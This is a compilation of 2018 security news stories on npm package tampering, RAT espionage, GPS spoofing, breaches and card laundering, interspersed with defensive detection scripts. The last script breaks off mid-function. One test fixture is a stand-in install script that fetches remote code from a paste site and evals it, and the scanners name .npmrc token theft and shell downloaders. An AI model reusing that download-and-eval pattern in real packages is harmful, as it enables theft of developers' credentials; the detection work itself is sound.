“We’re pleased to announce that we’ve shipped Python support. As of this week, Python users can now access the dependency graph and receive security alerts whenever their repositories depend on packages with known security vulnerabilities.” reads the announcement published by GitHub quality engineer Robert Schultheis.

“We’ve chosen to launch the new platform offering with a few recent vulnerabilities. Over the coming weeks, we will be adding more historical Python vulnerabilities to our database. Going forward, we will continue to monitor the NVD feed and other sources, and will send alerts on any newly disclosed vulnerabilities in Python packages.”

The company confirmed that the scanner is enabled by default on public repositories, while for private repositories maintainers need to opt in to security alerts in the repository settings or by giving the dependency graph access to the repo from the “Insights” tab.

“Public repositories will automatically have your dependency graph and security alerts enabled. For private repositories, you’ll need to opt in to security alerts in your repository settings or by allow access in the dependency graph section of your repository’s “Insights” tab.” concludes Schultheis.

“When vulnerability alerts are enabled, admins will receive security alerts by default. Admins can also add teams or individuals as recipients for security alerts by going into their repository’s settings page and navigating to the “Alerts” tab.”
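As an added illustration of what a dependency alert does (example code written for this page, not GitHub's own scanner): the script below parses a requirements.txt, compares exact pins against a small advisory list and reports the packages that need an upgrade. The advisory identifiers, package names and versions are constructed placeholders, and unpinned requirements are reported separately because they cannot be matched to a concrete version without a lockfile or the installed environment.

```python
"""Minimal pinned-dependency check in the spirit of GitHub's security alerts.

Added example; not GitHub's code. The advisory records and package names below
are constructed placeholders, not real advisories.
"""
import re
from typing import Dict, List, Tuple

# Constructed advisory database. "affected_below" is an exclusive upper bound:
# every version strictly below it is vulnerable; "fixed_in" is the first safe release.
ADVISORIES: List[Dict[str, str]] = [
    {"id": "PLACEHOLDER-ADV-001", "package": "examplelib",
     "affected_below": "2.1.0", "fixed_in": "2.1.0",
     "summary": "constructed: unsafe deserialization in examplelib < 2.1.0"},
    {"id": "PLACEHOLDER-ADV-002", "package": "otherlib",
     "affected_below": "1.3.0", "fixed_in": "1.3.0",
     "summary": "constructed: path traversal in otherlib < 1.3.0"},
]

_VERSION_RE = re.compile(r"^\d+(?:\.\d+)*$")
# name, optional operator, optional version; environment markers and comments are ignored.
_REQ_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(==|~=|>=|<=|!=|>|<)?\s*([^\s;#]*)")


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '2.0.3' into (2, 0, 3), padding to three components so tuples compare sanely."""
    if not _VERSION_RE.match(text):
        raise ValueError(f"unsupported version string: {text!r}")
    parts = [int(p) for p in text.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def parse_requirements(text: str) -> Tuple[Dict[str, str], List[str]]:
    """Split a requirements file into exact pins {name: version} and a list of unpinned names.

    Only '==' pins can be checked against an advisory; anything else would need a
    lockfile or the installed environment to resolve to a concrete version.
    """
    pinned: Dict[str, str] = {}
    unpinned: List[str] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):  # skip blanks, comments and pip options like -r/-e
            continue
        m = _REQ_RE.match(line)
        if not m:
            continue
        name, op, version = m.group(1).lower(), m.group(2), m.group(3)
        if op == "==" and version:
            pinned[name] = version
        else:
            unpinned.append(name)
    return pinned, unpinned


def check_requirements(text: str, advisories=ADVISORIES):
    """Return (alerts, unpinned): one alert per advisory whose package is pinned to a vulnerable version."""
    pinned, unpinned = parse_requirements(text)
    alerts = []
    for adv in advisories:
        installed = pinned.get(adv["package"].lower())
        if installed is None:
            continue
        if parse_version(installed) < parse_version(adv["affected_below"]):
            alerts.append({
                "package": adv["package"], "installed": installed,
                "advisory": adv["id"], "fixed_in": adv["fixed_in"], "summary": adv["summary"],
            })
    return alerts, unpinned


# Constructed requirements.txt for the example.
SAMPLE_REQUIREMENTS = """\
# constructed sample, not a real project
examplelib==2.0.3
otherlib==1.4.0
safelib>=3.0      # unpinned: cannot be matched against an advisory without a lockfile
"""

if __name__ == "__main__":
    found, loose = check_requirements(SAMPLE_REQUIREMENTS)
    for a in found:
        print(f"ALERT {a['advisory']}: {a['package']}=={a['installed']} -> upgrade to {a['fixed_in']} ({a['summary']})")
    for name in loose:
        print(f"NOTE  {name}: not pinned, resolve it from a lockfile before checking")
```

The version comparison is deliberately naive (numeric dotted versions only); a real tool would use PEP 440 semantics, which is exactly the kind of detail a hosted service like GitHub's handles for you.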


Trump – Putin meeting: “I don’t see any reason” for Russia to interfere with the US presidential election
19.7.2018 securityaffairs BigBrothers

Russian President Vladimir Putin ‘just said it’s not Russia,’ and President Trump believes him.
Today the controversial meeting between Russian President Vladimir Putin and US President Donald Trump was held in Helsinki, and, as expected, the Russian President denied any interference with the 2016 US election.
After the meeting, Putin and Trump held a joint news conference and, of course, President Trump confirmed his trust in the words of Putin.

“So I have great confidence in my intelligence people, but I will tell you that President Putin was extremely strong and powerful in his denial today,” Trump said.

Special Counsel Robert Mueller has a different opinion about the alleged Russian interference in the 2016 Presidential election: his investigation led to the indictment of 12 Russian intelligence officers working under the GRU for carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

“I don’t see any reason” for Russia to interfere with the US presidential election, this is Trump’s thought.

On Friday, director of national intelligence Daniel R. Coats warned of a devastating cyber threat to US infrastructure, he said that “warning lights are blinking red again.”

The Director of National Intelligence believes that Russia is the most aggressive threat actor and recent events demonstrate it.

“Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between campaigns launched by China and Russian ones.

According to Coats, China operates with the primary intent of stealing military and industrial secrets and has “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin, instead, operates to undermine U.S. values and democratic institutions.

“The role of the Intelligence Community is to provide the best information and fact-based assessments possible for the President and policymakers. We have been clear in our assessments of Russian meddling in the 2016 election and their ongoing, pervasive efforts to undermine our democracy, and we will continue to provide unvarnished and objective intelligence in support of our national security,” said Coats in a press statement released after the Trump-Putin press event.

HELSINKI, FINLAND – JULY 16: U.S. President Donald Trump (L) and Russian President Vladimir Putin answer questions about the 2016 U.S Election collusion during a joint press conference after their summit on July 16, 2018 in Helsinki, Finland. The two leaders met one-on-one and discussed a range of issues including the 2016 U.S Election collusion. (Photo by Chris McGrath/Getty Images)

Below is an excerpt from the full transcript of the Helsinki press conference about the alleged interference in the 2016 Presidential election.

“Once again, President Trump mentioned issue of so-called interference of Russia with the American elections. I had to reiterate things I said several times, including during our personal contacts, that the Russian state has never interfered and is not going to interfere in internal American affairs, including election process. Any specific material, if such things arise, we are ready to analyze together. For instance, we can analyze them through the joint working group on cyber security, the establishment of which we discussed during our previous contacts.” said Putin.

“During today’s meeting, I addressed directly with President Putin the issue of Russian interference in our elections. I felt this was a message best delivered in person. Spent a great deal of time talking about it. And President Putin may very well want to address it and very strongly, because he feels strongly about it and he has an interesting idea. We also discussed one of the most critical challenges facing humanity, nuclear proliferation. I provided an update on my meeting last month with Chairman Kim on the denuclearization of North Korea. After today, I am very sure that President Putin and Russia want very much to end that problem. Going to work with us, and I appreciate that commitment.” said Trump.


Crooks deployed malicious ESLint packages that steal software registry login tokens
19.7.2018 securityaffairs Virus

Hackers compromised the npm account of an ESLint maintainer and published malicious versions of eslint packages to the npm registry.
Crooks compromised an ESLint maintainer’s account last week and uploaded malicious packages that attempted to steal login tokens from the npm software registry. npm is the package manager for JavaScript and the world’s largest software registry.

ESLint is an open source “pluggable and configurable linter tool” for identifying and reporting on patterns in JavaScript; it was created by Nicholas Zakas.

The affected packages hosted on npm are:

eslint-scope version 3.7.2, a scope analysis library used by older versions of eslint and by the latest versions of babel-eslint and webpack.
eslint-config-eslint version 5.0.2, a configuration used internally by the ESLint team.
Once the tainted packages are installed, they download and execute code from pastebin.com designed to grab the content of the user’s .npmrc file and send it to the attacker. This file usually contains access tokens for publishing to npm.

“The attacker modified package.json in both eslint-scope@3.7.2 and eslint-config-eslint@5.0.2, adding a postinstall script to run build.js. This script downloads another script from Pastebin and evals its contents.” wrote Henry Zhu about the eslint-scope attack.

“The script extracts the _authToken from a user’s .npmrc and sends it to histats and statcounter inside the Referer header,”

The packages were quickly removed once they were discovered by maintainers and the content on pastebin.com was taken down.

“On July 12th, 2018, an attacker compromised the npm account of an ESLint maintainer and published malicious versions of the eslint-scope and eslint-config-eslint packages to the npm registry. On installation, the malicious packages downloaded and executed code from pastebin.com which sent the contents of the user’s .npmrc file to the attacker.” reads the security advisory published by ESLint.

“An .npmrc file typically contains access tokens for publishing to npm. The malicious package versions are eslint-scope@3.7.2 and eslint-config-eslint@5.0.2, both of which have been unpublished from npm. The pastebin.com paste linked in these packages has also been taken down.”


The npm login tokens grabbed by the malicious packages don’t include the user’s npm password, but npm opted to revoke possibly impacted tokens. Users can also revoke their existing tokens themselves, as suggested by npm.

“We have now invalidated all npm tokens issued before 2018-07-12 12:30 UTC, eliminating the possibility of stolen tokens being used maliciously. This is the final immediate operational action we expect to take today.” reads npm’s incident report.

Further investigation allowed the maintainers to determine that the account was compromised because the owner had reused the same password on multiple accounts and had not enabled two-factor authentication on their npm account.

ESLint released eslint-scope version 3.7.3 and eslint-config-eslint version 5.0.3.

Users who installed the malicious packages need to update npm.
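A defender-side check for this kind of tampering, as an added example (not ESLint's or npm's code): the script below inspects the lifecycle scripts of a package.json, follows a `node ./file.js` hook into the local script it runs, and flags the indicators the advisory describes (download from a paste site, eval of the downloaded content, access to .npmrc or _authToken). A second function lists which registries a leaked .npmrc would have exposed, so the owner knows which tokens to revoke. The package.json, build.js and .npmrc contents are constructed fixtures with placeholder values.

```python
"""Audit npm install hooks for the pattern seen in the eslint-scope incident.

Added example, not ESLint's or npm's code. The package.json, build.js and .npmrc
contents below are constructed fixtures with placeholder values.
"""
import json
import re
from typing import Dict, List

# Lifecycle scripts npm runs automatically during `npm install`; a tampered package
# uses one of these to execute code on every machine that installs it.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators modelled on the advisory above: the hook fetches remote content,
# evals it, and reads the npm credential file.
INDICATORS = [
    (re.compile(r"\beval\s*\("), "eval of dynamic content"),
    (re.compile(r"\bnew\s+Function\s*\("), "Function constructor on dynamic content"),
    (re.compile(r"https?://(?:www\.)?pastebin\.com/", re.I), "download from paste host"),
    (re.compile(r"\.npmrc\b"), "reads the user's .npmrc"),
    (re.compile(r"_authToken"), "references npm auth token"),
    (re.compile(r"\b(?:curl|wget)\b"), "shell download during install"),
]

# A hook command such as "node ./build.js": capture the local script so it is inspected too.
_NODE_FILE_RE = re.compile(r"\bnode\s+(?:\./)?([\w./-]+\.js)\b")


def audit_package(pkg: dict, files: Dict[str, str]) -> List[dict]:
    """Return one finding per (hook, source, indicator) match.

    pkg   -- parsed package.json
    files -- package-relative path -> file content, for scripts the hooks run
    """
    findings: List[dict] = []
    scripts = pkg.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        sources = [("package.json:" + hook, cmd)]
        for ref in _NODE_FILE_RE.findall(cmd):
            if ref in files:
                sources.append((ref, files[ref]))
        for source, text in sources:
            for pattern, label in INDICATORS:
                if pattern.search(text):
                    findings.append({"hook": hook, "source": source, "indicator": label})
    return findings


_TOKEN_LINE_RE = re.compile(r"^\s*(//[^:\s]+):_authToken\s*=")


def exposed_registries(npmrc_text: str) -> List[str]:
    """List registries whose tokens a stolen .npmrc would hand over (token values are never echoed)."""
    exposed = []
    for line in npmrc_text.splitlines():
        m = _TOKEN_LINE_RE.match(line)
        if m:
            exposed.append(m.group(1))
    return exposed


# Constructed fixture shaped like the tampered package: a postinstall hook running a local script.
TAMPERED_PKG = json.loads("""{
  "name": "constructed-example",
  "version": "0.0.1",
  "scripts": {"postinstall": "node ./build.js"}
}""")
TAMPERED_FILES = {
    "build.js": (
        "// constructed stand-in for the build.js described above, not the real file\n"
        "const https = require('https');\n"
        "https.get('https://pastebin.com/raw/PLACEHOLDER', res => {\n"
        "  let body = '';\n"
        "  res.on('data', c => body += c);\n"
        "  res.on('end', () => eval(body));\n"
        "});\n"
    ),
}
# A native add-on that compiles itself on install: it has a hook, but no indicators.
BENIGN_PKG = {"name": "constructed-native-addon",
              "scripts": {"install": "node-gyp rebuild", "test": "mocha"}}

# Constructed .npmrc with placeholder (non-functional) tokens.
SAMPLE_NPMRC = """\
//registry.npmjs.org/:_authToken=npm_PLACEHOLDER_NOT_A_REAL_TOKEN
//npm.example.internal/:_authToken=PLACEHOLDER
registry=https://registry.npmjs.org/
"""

if __name__ == "__main__":
    for f in audit_package(TAMPERED_PKG, TAMPERED_FILES):
        print(f"SUSPICIOUS {f['hook']} ({f['source']}): {f['indicator']}")
    print("benign findings:", audit_package(BENIGN_PKG, {}))
    print("registries to rotate if this .npmrc leaked:", exposed_registries(SAMPLE_NPMRC))
```

Install hooks are legitimate and common (native add-ons, for example), so the check reports indicators rather than the mere presence of a hook; the benign fixture produces no findings.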


Researchers show how to manipulate road navigation systems with low-cost devices
19.7.2018 securityaffairs Mobil

Researchers have developed a tool that poses as GPS satellites to deceive nearby GPS receivers and manipulate road navigation systems.
Researchers have developed a tool that poses as GPS satellites to deceive nearby GPS receivers. The kit could be used to deceive receivers used by navigation systems and give drivers wrong directions.

“we explore the feasibility of a stealthy manipulation attack against road navigation systems. The goal is to trigger the fake turn-by-turn navigation to guide the victim to a wrong destination without being noticed.” reads the research paper published by the experts.

“Our key idea is to slightly shift the GPS location so that the fake navigation route matches the shape of the actual roads and trigger physically possible instructions.”

The group of researchers is composed of three teams from Microsoft, Virginia Tech in the US, and the University of Electronic Science and Technology of China.

The boffins were able to spoof packets transmitted by satellites to mobile devices and navigation systems used in the automotive industry.

The tests conducted by the experts allowed them to remotely change routes with up to 95 per cent accuracy. The researchers built a radio-transmitting device based on a Raspberry Pi using just $223 of components.

The radio-transmitting device broadcasts fake location data and prevents the receivers from obtaining the real positioning data from the satellites.

In a real attack scenario, the device could be used to deceive navigation systems in cars.


“We show that adversaries can build a portable spoofer with low costs (about $223), which can easily penetrate the car body to take control of the GPS navigation system.” continues the paper.

“Our measurement shows that effective spoofing range is 40–50 meters and the target device can consistently latch onto the false signals without losing connections,”

In order to make the attack stealthy, the researchers experimented with stashing the spoofing device in the trunk of a car or under the back seat.

They were able to add new route details via a cellular network connection without following the target.

In a field test conducted in a Chinese parking lot, the researchers deceived a navigation system in 48 seconds with the device hidden in the trunk, and in just 38 seconds with the device under the seat.

The experts used data from OpenStreetMap to construct routes for the target.

“Compared to spoofing a drone or a ship, there are unique challenges to manipulate the road navigation systems. First, road navigation attack has strict geographical constraints. It is far more challenging to perform GPS spoofing attacks in real-time while coping with road maps and vehicle speed limits.” continues the paper.

“In addition, human drivers are in the loop of the attack, which makes a stealthy attack necessary.”

Experts highlighted that the spoofing attacks could be very effective: in a trial involving 40 volunteer drivers, the attackers were able to trick the targets into following the fake routes 95 per cent of the time.

Such attacks could be particularly dangerous when dealing with self-driving cars and trucks.

The researchers also proposed countermeasures to prevent the attacks, such as the use of encrypted signals also for civilian GPS.


Cyber espionage campaign targets Samsung service centers in Italy
19.7.2018 securityaffairs CyberSpy

Security researchers from the Italian security firm TG Soft have uncovered an ongoing malware campaign targeting Samsung service centers in Italy.
“TG Soft’s Research Centre (C.R.A.M.) has analyzed the campaign of spear-phishing on 2 april 2018 targeting the service centers of Samsung Italy.” reads the analysis published by TG Soft.

“The campaign analyzed is targeting only the service centers of Samsung Italy, it’s a multi-stage attack and we have monitored it until July 2018”

The campaign has similarities with the campaigns that targeted similar electronics service centers in Russia, which were discovered by Fortinet in June. The attackers’ motivation is still unclear; the experts explained that the malicious code is not particularly sophisticated.

The attackers used spear-phishing emails sent to Samsung Italy service center workers. The messages have attached weaponized Excel documents.

The documents trigger the CVE-2017-11882 Office Equation Editor vulnerability to infect users.

According to a technical report published by the experts, this attack and the one against Russian service centers offering maintenance and support for various electronic goods started in the same period, in March.

While Russian service centers were hit by the Imminent Monitor RAT, the attacks on Samsung Italy service centers also involved other RATs, such as Netwire and njRAT.

The quality of the spear phishing messages was high in both campaigns; they appear to have been written by native Italian and Russian speakers, respectively.

The attachment used in this campaign is an Excel document titled “QRS non autorizzati.xlsx,” while the phishing messages are signed with the name of the Samsung IT Service Manager, a real employee of Samsung Italia, and include the email address and phone numbers of the employee.


At the time, the experts were not able to attribute the attack to a specific threat actor. Electronics service centers do not appear to be particularly interesting targets on their own, because the volume of data they manage is small.

The attackers probably aim to compromise the remote management tools used by these services in order to gain control over the computers of the customers who request support from the electronics service centers.

“Command and control servers use services like noip.me or ddns.net, which in combination with a VPN, allow hiding the IP address of the server where the exfiltrated data is sent.” concludes the report.
“During the analysis in some cases, the C2 servers were not online and the RAT failed to contact them, and then returned active after a few tens of hours with a new IP address.
The actors behind this attack remain unknown …”

The Italian version of the report that includes also the IoCs is available here.


QUASAR, SOBAKEN AND VERMIN RATs involved in espionage campaign on Ukraine
19.7.2018 securityaffairs Virus

Security experts from ESET uncovered an ongoing cyber espionage campaign aimed at Ukrainian government institutions and involving three different RATs, including the custom-made VERMIN.
Security researchers from ESET uncovered an ongoing cyber espionage campaign aimed at Ukrainian government institutions, attackers used at least three different remote access Trojans (RATs).

The campaign was first spotted in January by experts from PaloAlto Networks, when the researchers discovered a new piece of malware tracked as VERMIN RAT targeting Ukrainian organizations.

“Pivoting further on the initial samples we discovered, and their infrastructure, revealed a modestly sized campaign going back to late 2015 using both Quasar RAT and VERMIN.” reads the report from PaloAlto Networks.


Back to the present, the experts discovered that the attackers used several RATs to steal sensitive documents, the researchers collected evidence of the involvement of the Quasar RAT, Sobaken RAT, and Vermin.

The Quasar RAT is available for free on GitHub, many other attackers used it in their campaigns, including the Gaza Cybergang, which is also known as Gaza Hackers Team and Molerats. Sobaken is an improved version of Quasar RAT, that includes several anti-sandbox and other evasion mechanisms.

The RATs have been used against different targets at the same time, experts noticed they share some infrastructure and connect to the same C&C servers.


The threat actors don’t have advanced skills, their attack vector is spear phishing messages and they have been quite successful in using social engineering to lure victims into opening the email and downloading and executing the malicious codes.

“Even though these threat actors don’t seem to possess advanced skills or access to 0-day vulnerabilities, they have been quite successful in using social engineering to both distribute their malware and fly under the radar for extended periods of time.” reads the analysis published by ESET.

“We were able to trace attacker activity back to October 2015; however, it is possible that the attackers have been active even longer. These attackers use three different .NET malware strains in their attacks – Quasar RAT, Sobaken (a RAT derived from Quasar) and a custom-made RAT called Vermin. All three malware strains have been in active use against different targets at the same time, they share some infrastructure and connect to the same C&C servers.”

Some emails carried weaponized Word documents attempting to exploit CVE-2017-0199; the attackers used a dropper that masquerades as legitimate software (e.g. Adobe, Intel or Microsoft) to deliver the final payload.

The threat actors used a scheduled task that executes the malware every 10 minutes to achieve persistence on the infected machine.

“The installation procedure is the same for all three malware strains used by these attackers. A dropper drops a malicious payload file (Vermin, Quasar or Sobaken malware) into the %APPDATA% folder, in a subfolder named after a legitimate company (usually Adobe, Intel or Microsoft).” continues the report.

“Then it creates a scheduled task that runs the payload every 10 minutes to ensure its persistence.”

Since mid-2017, the threat actors adopted steganography to bypass content filtering by hiding the payloads in images that were hosted on the free image hosting websites saveshot.net and ibb.co.

The malicious code executes only on hosts where the Russian or Ukrainian keyboard layouts are installed; it also checks the IP address and the username on the target machine.

To evade automated analysis systems, which often use tools like Fakenet-NG where all DNS/HTTP communication succeeds and returns some result, the malware generates a random website name/URL and attempts to connect to it. If the connection fails, the system can in some cases be considered real rather than a virtualized environment used by researchers.
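As an added detection example (not ESET's tooling), the script below parses scheduled-task output for the persistence described above: a payload under %APPDATA% in a folder named after Adobe, Intel or Microsoft, repeated every few minutes. The CSV is a constructed sample in the style of `schtasks /query /fo CSV /v`; the column names it relies on ("TaskName", "Task To Run", "Repeat: Every") are assumed, and the host, task names and paths are invented.

```python
"""Flag scheduled tasks that match the persistence described in the report above.

Added example, not ESET's tooling. Input is a constructed CSV in the style of
`schtasks /query /fo CSV /v`; only the "TaskName", "Task To Run" and
"Repeat: Every" columns are used and their names are assumed.
"""
import csv
import io
import re
from typing import List, Optional

# Vendor names the dropper borrows for its %APPDATA% subfolder, per the report.
VENDOR_DIRS = {"adobe", "intel", "microsoft"}

# First path component under the roaming profile, in either %APPDATA% or expanded form.
_APPDATA_RE = re.compile(r'(?:%APPDATA%|\\AppData\\Roaming)\\([^\\"]+)', re.I)
_HOURS_RE = re.compile(r"(\d+)\s*Hour")
_MINUTES_RE = re.compile(r"(\d+)\s*Minute")


def repeat_minutes(value: str) -> Optional[int]:
    """Parse '0 Hour(s), 10 Minute(s)' into 10; return None for 'N/A' or unknown formats."""
    hours, minutes = _HOURS_RE.search(value), _MINUTES_RE.search(value)
    if not hours and not minutes:
        return None
    return (int(hours.group(1)) if hours else 0) * 60 + (int(minutes.group(1)) if minutes else 0)


def suspicious_tasks(csv_text: str, max_minutes: int = 15) -> List[dict]:
    """Return tasks whose action lives under the roaming profile and that either use a
    vendor-named folder or fire at least every `max_minutes` minutes."""
    hits: List[dict] = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        action = row.get("Task To Run") or ""
        m = _APPDATA_RE.search(action)
        if not m:
            continue  # binaries outside the roaming profile are out of scope for this check
        subdir = m.group(1)
        every = repeat_minutes(row.get("Repeat: Every") or "")
        reasons = []
        if subdir.lower() in VENDOR_DIRS:
            reasons.append(f"runs from a user-writable folder named after a vendor ({subdir})")
        if every is not None and every <= max_minutes:
            reasons.append(f"repeats every {every} minutes")
        if reasons:
            hits.append({"task": row.get("TaskName"), "action": action,
                         "repeat_minutes": every, "reasons": reasons})
    return hits


# Constructed sample: one system task, one task matching the described persistence, and one
# legitimate per-user updater under AppData\Local (not Roaming) with an hourly schedule.
SAMPLE_CSV = r'''"HostName","TaskName","Next Run Time","Status","Task To Run","Repeat: Every"
"WS-01","\Microsoft\Windows\Defrag\ScheduledDefrag","N/A","Ready","%windir%\system32\defrag.exe -c -h -o -$","N/A"
"WS-01","\Intel Software Updater","7/19/2018 10:20:00 AM","Ready","%APPDATA%\Intel\IntelUpdate.exe","0 Hour(s), 10 Minute(s)"
"WS-01","\OneDrive Standalone Update Task","7/19/2018 11:00:00 AM","Ready","C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe","1 Hour(s), 0 Minute(s)"
'''

if __name__ == "__main__":
    for hit in suspicious_tasks(SAMPLE_CSV):
        print(f"SUSPICIOUS {hit['task']}: {hit['action']}")
        for reason in hit["reasons"]:
            print(f"  - {reason}")
```

Both signals on their own are weak (plenty of legitimate software runs from the profile, and short repeat intervals exist), so the check requires the roaming-profile location plus at least one of the two report-specific traits; on a real host the hits are leads for an analyst, not verdicts.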

“Among the many different malware attacks targeted at high value assets in Ukraine, these attackers haven’t received much public attention – perhaps because of their initial use of open-source-based malware before developing their own strain (Vermin).” concludes the report.

“Employing multiple malware families, as well as various infection mechanisms – including common social engineering techniques but also not-so-common steganography – over the past three years, could be explained by the attackers simply experimenting with various techniques and malware, or it may suggest operations by multiple subgroups.”

Further details on the campaign, including the IoCs are included in the report.


US Biggest Blood Testing Laboratories LabCorp suffered a security breach
19.7.2018 securityaffairs Incident

Hackers have breached the network at LabCorp, one of the largest diagnostic blood testing laboratories in the US, millions of Americans potentially at risk.
LabCorp, the biggest blood testing laboratory network in the US, has suffered a security breach. The company announced the incident on Monday; the breach occurred over the weekend.

The hackers breached the LabCorp Diagnostics systems, but the company says there is no indication that the attackers also compromised the systems used by its drug development business Covance.

“At this time, there is no evidence of unauthorized transfer or misuse of data. LabCorp has notified the relevant authorities of the suspicious activity and will cooperate in any investigation,” it said, in its statement.

LabCorp did not share further details about the security breach, in response to the incident the company shut down part of its infrastructure.

“LabCorp immediately took certain systems offline as part of its comprehensive response to contain the activity,” the firm said in an 8-K filed with the Securities and Exchange Commission.

“This temporarily affected test processing and customer access to test results over the weekend. Work has been ongoing to restore full system functionality as quickly as possible, testing operations have substantially resumed today, and we anticipate that additional systems and functions will be restored through the next several days,”

Mike Thomas, a technologist at LabCorp, works with patient samples at the company’s location in Burlington. JULIE KNIGHT – Source www.bizjournals.com

Testing operations have substantially resumed, other functions will be fully restored over the next days, and in the meantime some customers may face brief delays.

“We anticipate that additional systems and functions will be restored throughout the next several days,” it added. “Some customers of LabCorp Diagnostics may experience brief delays in receiving results as we complete that process.”

The hack might have severe consequences for millions of Americans because of the potential extent of the breached network, which connects thousands of hospitals and testing facility offices worldwide.


How crooks conduct Money Laundering operations through mobile games
19.7.2018 securityaffairs Mobile

Experts uncovered a money laundering ring that leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards.
A money laundering ring leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards and then sells these game premiums on online forums and within gaming communities.

The money laundering operation was unveiled by the US Department of Justice; the investigation started in mid-June, when experts from Kromtech Security discovered a MongoDB database exposed online. The database held information related to carders’ activities, including 150,833 unique card records (card number, expiration date, and CVV).

“Following our MongoDB investigations and honey pots deployments from the beginning of this year, we did another round of security audit of unprotected MongoDB instances. In June 2018 we have spotted a strange database publicly exposed to the public internet (no password/login required) along with a large number of credit card numbers and personal information inside.” reads the blog post published by Kromtech Security.

“As we examined the database we rapidly became aware that this was not your ordinary corporate database, this database appeared to belong to credit card thieves (commonly known as carders) and that it was relatively new, only a few months old. So we dug much deeper.”

The activity of the criminal gang behind the operation is as simple as it is effective. Crooks used a special tool to create iOS accounts from valid email accounts, then associated the stolen payment cards with those accounts. Most of the created accounts belong to users located in Saudi Arabia, India, Indonesia, Kuwait, and Mauritania.

The group then jailbroke iOS devices to install various games, created in-game accounts, and used them to purchase game features or premiums.

The cash-out came later, when the crooks re-sold the game features or premiums online for real money.

Experts found that the credit cards belonged to 19 different banks; they speculated the cards were probably bought on carder markets, where they are offered in batches of 10k, 20k, or 30k.

The list of mobile games used by the cybercriminals includes popular apps such as Clash of Clans and Clash Royale developed by Supercell, and Marvel Contest of Champions developed by Kabam.

The three apps have a combined gaming community of over 250 million users and generate approximately $330 million USD a year in revenue. The associated third-party markets are very active: websites like g2g.com allow gamers to buy and sell resources and games, a great opportunity for crooks involved in money laundering.


“It is interesting to note that these three games are not even in the top five games. Scaling this scheme across other popular apps and games with in-app purchases places the potential market well into the billions of dollars USD per year.” reported Kromtech Security.

| App | Offered by | Android users | Release | Metacritic score | In-app products, price per item | Daily revenue ($) | Yearly revenue ($) |
|---|---|---|---|---|---|---|---|
| Clash of Clans | Supercell | 100,000,000+ | 2012 | 74/100 | $0.99 – $99.99 | 684,002 | 250M |
| Clash Royale | Supercell | 100,000,000+ | 2016 | 86/100 | $0.99 – $99.99 | 153,150 | 56M |
| Marvel Contest of Champions | Kabam | 50,000,000+ | 2014 | 76/100 | $0.99 – $99.99 | 64,296 | 23.5M |

The experts also found that Apple was applying a lax credit card verification process when users add payment card data to iOS accounts, which facilitates fraudulent activity. They noticed that cards with improper names and addresses were approved by Apple, and for this reason they reported their discovery to Apple.

The experts also highlighted that game makers do not implement the measures needed to prevent this kind of abuse. For example, game makers do not control the interaction with Supercell games of tools like Raccoonbot, which are used to automate the buying of premium features.

“Raccoonbot.com is an automated bot dedicated to Supercell’s Clash of the Clans. It advertises itself in its forum as a way to “Become rich at Clash of the Clans”. This is done by automating the game and selling the gems. It can potentially be used in conjunction with MaxTooliOS to further enhance the profit from the stolen credit cards. It’s a direct violation of Supercell policy, it aids in laundering money, and it also remains in operation.” continues the analysis.

“iGameSupply is an approved marketplace for selling Raccoonbot generated gems https://www.raccoonbot.com/forum/forum/80-approved-marketplace/”


Expert discovered RoboCent AWS S3 bucket containing US voters’ records exposed online
19.7.2018 securityaffairs BigBrothers

A security researcher has discovered that the US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.
The US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.

The researcher Bob Diachenko from Kromtech Security discovered the company’s database exposed online. The expert was using the online service GrayhatWarfare, which can be used to search publicly exposed Amazon Web Services storage buckets.

The company sells voter records for a price of 3¢ per record, the same data that was left exposed online.

Querying the service for the term “voters”, he found the AWS bucket used by RoboCent.

The bucket discovered by the expert contained 2,584 files; the exposed voter data includes:

Full Name, suffix, prefix
Phone numbers (cell and landlines)
Address with house, street, city, state, zip, precinct
Political affiliation provided by state, or inferred based on voting trends/history
Age and birth year
Gender
Jurisdiction breakdown based on district, zip code, precinct, county, state
Demographics based on ethnicity, language, education

The server also contained audio files with prerecorded political messages used for the robo-calling service.

“Just when I thought the days of misconfigured AWS S3 buckets are over, I discovered massive US voter data online, apparently being part of Robocent, a Virginia Beach-based political autodial firm’s cloud storage.” wrote Diachenko.

“Many of the files did not originate at Robocent, but are instead the aggregate of outside data firms such as NationalBuilder.”

Diachenko responsibly disclosed the discovery to the company, which quickly secured the bucket. Below is the message sent by the company developer who solved the issue.

“We’re a small shop (I’m the only developer) so keeping track of everything can be tough”

This isn’t the first case of unsecured Amazon S3 buckets exposed online: in June 2017, the firm DRA left 1.1 TB of data unsecured on an Amazon S3 bucket, exposing 198 million US voter records.

In December 2017, Diachenko discovered another exposed MongoDB database, containing voter registration data for more than 19 million California residents.
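Both S3 incidents above come down to one of two settings: a bucket ACL that grants a permission to the global AllUsers or AuthenticatedUsers groups (READ on a bucket ACL lets anyone list its contents, which is what makes a bucket findable by search services), or a bucket policy that allows a wildcard principal. The following is an added defensive check, not code from the article, Kromtech or RoboCent; it assumes grants in the shape boto3's get_bucket_acl() returns, and the sample ACL and policy are constructed.

```python
import json

# Real S3 grantee group URIs; an ACL grant to either one is public.
PUBLIC_GRANTEE_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anyone on the internet",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account holder",
}

def public_acl_grants(acl):
    """Findings for ACL grants that open the bucket to everyone.
    `acl` has the shape of boto3 get_bucket_acl()['Grants'] (assumed here)."""
    findings = []
    for grant in acl:
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI")
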